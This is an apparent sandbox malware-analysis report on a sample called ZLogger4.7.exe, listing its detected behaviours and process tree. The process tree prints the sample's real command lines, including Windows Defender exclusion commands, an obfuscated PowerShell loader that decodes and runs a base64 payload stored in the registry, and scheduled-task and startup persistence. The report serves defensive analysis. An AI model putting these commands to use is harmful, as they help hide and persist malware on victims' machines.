Analysis
-
max time kernel
1799s -
max time network
1169s -
platform
windows10-2004_x64 -
resource
win10v2004-20231025-en -
resource tags
arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2023 14:46
Behavioral task
behavioral1
Sample
ZLogger4.7.exe
Resource
win7-20231020-en
Behavioral task
behavioral2
Sample
ZLogger4.7.exe
Resource
win10v2004-20231025-en
General
-
Target
ZLogger4.7.exe
-
Size
79.0MB
-
MD5
d0146ba4a2389891791ef2f1c0ac7a1c
-
SHA1
d101f0319da6dae09d406a7b0227b5e95725e16c
-
SHA256
9236a756a4f1d70338c934f0a0f0be119d6cc7319ee73a44a416cd2f17064987
-
SHA512
130a48c2edc56c56d77d8197a34a6af4b6764f69ab590599c697da1387deb3fda092571d55c85a3e76d3dd5c23ed64c53676d57b395ea5ee64576b93a0ea6400
-
SSDEEP
1572864:02MmiJR5QYHJiXGSk8IpG7V+VPhqoHZE7xHp5tWWfsnghowmaOllIWgawuBeWBg6:0ZmCxp0GSkB05awoHYJjlmghfxOllIR5
Malware Config
Signatures
-
Enumerates VirtualBox DLL files 2 TTPs 4 IoCs
Processes:
ZLogger4.7.exeZLoggerV4.7.exedescription ioc process File opened (read-only) C:\windows\system32\vboxhook.dll ZLogger4.7.exe File opened (read-only) C:\windows\system32\vboxmrxnp.dll ZLogger4.7.exe File opened (read-only) C:\windows\system32\vboxhook.dll ZLoggerV4.7.exe File opened (read-only) C:\windows\system32\vboxmrxnp.dll ZLoggerV4.7.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
ZLoggerV4.7.execmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation ZLoggerV4.7.exe Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 4 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClie1nt.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClie1nt.lnk powershell.exe -
Executes dropped EXE 3 IoCs
Processes:
ZLoggerV4.7.exeZLoggerV4.7.exeXClie1nt.exepid process 1980 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4328 XClie1nt.exe -
Loads dropped DLL 64 IoCs
Processes:
ZLogger4.7.exepid process 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI48962\python311.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\python311.dll upx behavioral2/memory/2088-1262-0x00007FFF19D40000-0x00007FFF1A329000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libffi-8.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_ctypes.pyd upx behavioral2/memory/2088-1271-0x00007FFF2A370000-0x00007FFF2A393000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_bz2.pyd upx behavioral2/memory/2088-1273-0x00007FFF2F7C0000-0x00007FFF2F7CF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_tkinter.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_ssl.pyd upx behavioral2/memory/2088-1316-0x00007FFF2A320000-0x00007FFF2A34D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libcrypto-3.dll upx behavioral2/memory/2088-1320-0x00007FFF2A300000-0x00007FFF2A314000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libssl-3.dll upx behavioral2/memory/2088-1329-0x00007FFF2A2E0000-0x00007FFF2A2F9000-memory.dmp upx behavioral2/memory/2088-1330-0x00007FFF2AB10000-0x00007FFF2AB1D000-memory.dmp upx behavioral2/memory/2088-1331-0x00007FFF2A2A0000-0x00007FFF2A2D3000-memory.dmp upx behavioral2/memory/2088-1332-0x00007FFF2A1D0000-0x00007FFF2A29D000-memory.dmp upx behavioral2/memory/2088-1334-0x00007FFF2A7B0000-0x00007FFF2A7BB000-memory.dmp upx behavioral2/memory/2088-1335-0x00007FFF2A1A0000-0x00007FFF2A1C6000-memory.dmp upx behavioral2/memory/2088-1336-0x00007FFF2A030000-0x00007FFF2A03B000-memory.dmp upx behavioral2/memory/2088-1337-0x00007FFF2A020000-0x00007FFF2A02C000-memory.dmp upx behavioral2/memory/2088-1333-0x00007FFF2A8C0000-0x00007FFF2A8CD000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\charset_normalizer\md__mypyc.cp311-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\charset_normalizer\md.cp311-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\charset_normalizer\md.cp311-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_socket.pyd upx behavioral2/memory/2088-1319-0x00007FFF19820000-0x00007FFF19D40000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_overlapped.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_multiprocessing.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_elementtree.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_cffi_backend.cp311-win_amd64.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\_asyncio.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\zlib1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\tk86t.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\tcl86t.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\SDL2_ttf.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\SDL2_mixer.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\SDL2_image.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\SDL2.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\pyexpat.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\portmidi.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libwebp-7.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libtiff-5.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libssl-3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libpng16-16.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI48962\libopusfile-0.dll upx -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
ZLogger4.7.exepowershell.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BoolCheck = "C:\\Users\\Admin\\AMSIIntegrity\\ZLoggerV4.7.exe" ZLogger4.7.exe Set value (str) \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClie1nt = "C:\\Users\\Admin\\XClie1nt.exe" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exeipconfig.exepid process 3376 ipconfig.exe 840 ipconfig.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2216 taskkill.exe -
Modifies registry class 2 IoCs
Processes:
ZLoggerV4.7.execmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings ZLoggerV4.7.exe Key created \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
vlc.exepid process 2956 vlc.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
ZLogger4.7.exepowershell.exeZLoggerV4.7.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeXClie1nt.exepid process 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2088 ZLogger4.7.exe 2576 powershell.exe 2576 powershell.exe 2576 powershell.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 4356 ZLoggerV4.7.exe 1716 powershell.exe 1716 powershell.exe 3684 powershell.exe 3684 powershell.exe 1832 powershell.exe 1832 powershell.exe 3792 powershell.exe 3792 powershell.exe 2388 powershell.exe 2388 powershell.exe 400 powershell.exe 400 powershell.exe 3684 powershell.exe 4328 XClie1nt.exe 4328 XClie1nt.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
ZLoggerV4.7.exevlc.exepid process 4356 ZLoggerV4.7.exe 2956 vlc.exe -
Suspicious use of AdjustPrivilegeToken 58 IoCs
Processes:
ZLogger4.7.exepowershell.exetaskkill.exeZLoggerV4.7.exepowershell.exeWMIC.exeAUDIODG.EXEvlc.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeXClie1nt.exedescription pid process Token: SeDebugPrivilege 2088 ZLogger4.7.exe Token: SeDebugPrivilege 2576 powershell.exe Token: SeDebugPrivilege 2216 taskkill.exe Token: SeDebugPrivilege 4356 ZLoggerV4.7.exe Token: SeDebugPrivilege 1716 powershell.exe Token: SeIncreaseQuotaPrivilege 224 WMIC.exe Token: SeSecurityPrivilege 224 WMIC.exe Token: SeTakeOwnershipPrivilege 224 WMIC.exe Token: SeLoadDriverPrivilege 224 WMIC.exe Token: SeSystemProfilePrivilege 224 WMIC.exe Token: SeSystemtimePrivilege 224 WMIC.exe Token: SeProfSingleProcessPrivilege 224 WMIC.exe Token: SeIncBasePriorityPrivilege 224 WMIC.exe Token: SeCreatePagefilePrivilege 224 WMIC.exe Token: SeBackupPrivilege 224 WMIC.exe Token: SeRestorePrivilege 224 WMIC.exe Token: SeShutdownPrivilege 224 WMIC.exe Token: SeDebugPrivilege 224 WMIC.exe Token: SeSystemEnvironmentPrivilege 224 WMIC.exe Token: SeRemoteShutdownPrivilege 224 WMIC.exe Token: SeUndockPrivilege 224 WMIC.exe Token: SeManageVolumePrivilege 224 WMIC.exe Token: 33 224 WMIC.exe Token: 34 224 WMIC.exe Token: 35 224 WMIC.exe Token: 36 224 WMIC.exe Token: SeIncreaseQuotaPrivilege 224 WMIC.exe Token: SeSecurityPrivilege 224 WMIC.exe Token: SeTakeOwnershipPrivilege 224 WMIC.exe Token: SeLoadDriverPrivilege 224 WMIC.exe Token: SeSystemProfilePrivilege 224 WMIC.exe Token: SeSystemtimePrivilege 224 WMIC.exe Token: SeProfSingleProcessPrivilege 224 WMIC.exe Token: SeIncBasePriorityPrivilege 224 WMIC.exe Token: SeCreatePagefilePrivilege 224 WMIC.exe Token: SeBackupPrivilege 224 WMIC.exe Token: SeRestorePrivilege 224 WMIC.exe Token: SeShutdownPrivilege 224 WMIC.exe Token: SeDebugPrivilege 224 WMIC.exe Token: SeSystemEnvironmentPrivilege 224 WMIC.exe Token: SeRemoteShutdownPrivilege 224 WMIC.exe Token: SeUndockPrivilege 224 WMIC.exe Token: SeManageVolumePrivilege 224 WMIC.exe Token: 33 224 WMIC.exe Token: 34 224 WMIC.exe Token: 35 224 WMIC.exe Token: 36 224 WMIC.exe Token: 33 3448 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 3448 AUDIODG.EXE Token: 33 2956 vlc.exe Token: SeIncBasePriorityPrivilege 2956 vlc.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeDebugPrivilege 3792 powershell.exe Token: SeDebugPrivilege 2388 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 4328 XClie1nt.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
Processes:
vlc.exepid process 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe -
Suspicious use of SendNotifyMessage 8 IoCs
Processes:
vlc.exepid process 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
ZLoggerV4.7.exevlc.exepowershell.exepid process 4356 ZLoggerV4.7.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 2956 vlc.exe 3684 powershell.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
ZLogger4.7.exeZLogger4.7.execmd.exeZLoggerV4.7.exeZLoggerV4.7.execmd.execmd.execmd.exeWScript.exepowershell.exeXClie1nt.exedescription pid process target process PID 4896 wrote to memory of 2088 4896 ZLogger4.7.exe ZLogger4.7.exe PID 4896 wrote to memory of 2088 4896 ZLogger4.7.exe ZLogger4.7.exe PID 2088 wrote to memory of 5012 2088 ZLogger4.7.exe cmd.exe PID 2088 wrote to memory of 5012 2088 ZLogger4.7.exe cmd.exe PID 2088 wrote to memory of 2576 2088 ZLogger4.7.exe powershell.exe PID 2088 wrote to memory of 2576 2088 ZLogger4.7.exe powershell.exe PID 2088 wrote to memory of 2236 2088 ZLogger4.7.exe cmd.exe PID 2088 wrote to memory of 2236 2088 ZLogger4.7.exe cmd.exe PID 2236 wrote to memory of 2844 2236 cmd.exe attrib.exe PID 2236 wrote to memory of 2844 2236 cmd.exe attrib.exe PID 2236 wrote to memory of 1980 2236 cmd.exe ZLoggerV4.7.exe PID 2236 wrote to memory of 1980 2236 cmd.exe ZLoggerV4.7.exe PID 2236 wrote to memory of 2216 2236 cmd.exe taskkill.exe PID 2236 wrote to memory of 2216 2236 cmd.exe taskkill.exe PID 1980 wrote to memory of 4356 1980 ZLoggerV4.7.exe ZLoggerV4.7.exe PID 1980 wrote to memory of 4356 1980 ZLoggerV4.7.exe ZLoggerV4.7.exe PID 4356 wrote to memory of 5092 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 5092 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 1716 4356 ZLoggerV4.7.exe powershell.exe PID 4356 wrote to memory of 1716 4356 ZLoggerV4.7.exe powershell.exe PID 4356 wrote to memory of 3520 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 3520 4356 ZLoggerV4.7.exe cmd.exe PID 3520 wrote to memory of 224 3520 cmd.exe WMIC.exe PID 3520 wrote to memory of 224 3520 cmd.exe WMIC.exe PID 4356 wrote to memory of 5024 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 5024 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2956 4356 ZLoggerV4.7.exe vlc.exe PID 4356 wrote to memory of 2956 4356 ZLoggerV4.7.exe vlc.exe PID 4356 wrote to memory of 2128 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2128 4356 ZLoggerV4.7.exe cmd.exe PID 2128 wrote to memory of 3376 2128 cmd.exe ipconfig.exe PID 2128 wrote to memory of 3376 2128 cmd.exe ipconfig.exe PID 4356 wrote to memory of 2880 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2880 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2864 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2864 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4660 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4660 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2268 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 2268 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4120 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4120 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4924 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 4924 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 1504 4356 ZLoggerV4.7.exe cmd.exe PID 4356 wrote to memory of 1504 4356 ZLoggerV4.7.exe cmd.exe PID 1504 wrote to memory of 3816 1504 cmd.exe WScript.exe PID 1504 wrote to memory of 3816 1504 cmd.exe WScript.exe PID 3816 wrote to memory of 3684 3816 WScript.exe powershell.exe PID 3816 wrote to memory of 3684 3816 WScript.exe powershell.exe PID 3684 wrote to memory of 1832 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 1832 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 3792 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 3792 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 2388 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 2388 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 400 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 400 3684 powershell.exe powershell.exe PID 3684 wrote to memory of 3744 3684 powershell.exe schtasks.exe PID 3684 wrote to memory of 3744 3684 powershell.exe schtasks.exe PID 4328 wrote to memory of 840 4328 XClie1nt.exe ipconfig.exe PID 4328 wrote to memory of 840 4328 XClie1nt.exe ipconfig.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4896 -
C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"C:\Users\Admin\AppData\Local\Temp\ZLogger4.7.exe"2⤵
- Enumerates VirtualBox DLL files
- Loads dropped DLL
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"3⤵PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AMSIIntegrity\""3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AMSIIntegrity\activate.bat3⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\attrib.exeattrib +s +h .4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2844
-
-
C:\Users\Admin\AMSIIntegrity\ZLoggerV4.7.exe"ZLoggerV4.7.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Users\Admin\AMSIIntegrity\ZLoggerV4.7.exe"ZLoggerV4.7.exe"5⤵
- Enumerates VirtualBox DLL files
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"6⤵PID:5092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AMSIIntegrity\""6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵
- Suspicious use of AdjustPrivilegeToken
PID:224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"6⤵PID:5024
-
-
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jumpscare.mp4"6⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2956
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"6⤵
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\system32\ipconfig.exeipconfig7⤵
- Gathers network information
PID:3376
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.49.wav"6⤵PID:2880
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"6⤵PID:2864
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.51.wav"6⤵PID:4660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del C:\Users\Admin\AMSIIntegrity\ss.png"6⤵PID:2268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.53.wav"6⤵PID:4120
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "del rec_\25.11.2023_14.55.wav"6⤵PID:4924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start "" "C:/Users/Admin/AMSIIntegrity/FUD.vbs""6⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1504 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AMSIIntegrity\FUD.vbs"7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -exec bypass -window 1 -Command Copy-Item 'C:\Users\Admin\AMSIIntegrity\FUD.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chrome.vbs'; $beautyberry = ((Get-ItemProperty HKCU:\Software\Chrome\).Updates); $beautyberry = -join $beautyberry[-1..-$beautyberry.Length];[<##>AppDomain<##>]::<##>('nonvocationallyurrentDomain'.replace('nonvocationally','C'))<##>.<##>('hexameraload'.replace('hexameral','L'))([Convert]::FromBase64String($beautyberry))<##>.<##>('sextettesntryPoint'.replace('sextettes','E'))<##>.<##>('InDaleaoke'.replace('Dalea','v'))($Null,$Null)<##>;8⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\XClie1nt.exe'9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClie1nt.exe'9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:400
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClie1nt" /tr "C:\Users\Admin\XClie1nt.exe"9⤵
- Creates scheduled task(s)
PID:3744
-
-
-
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im "ZLogger4.7.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2216
-
-
-
-
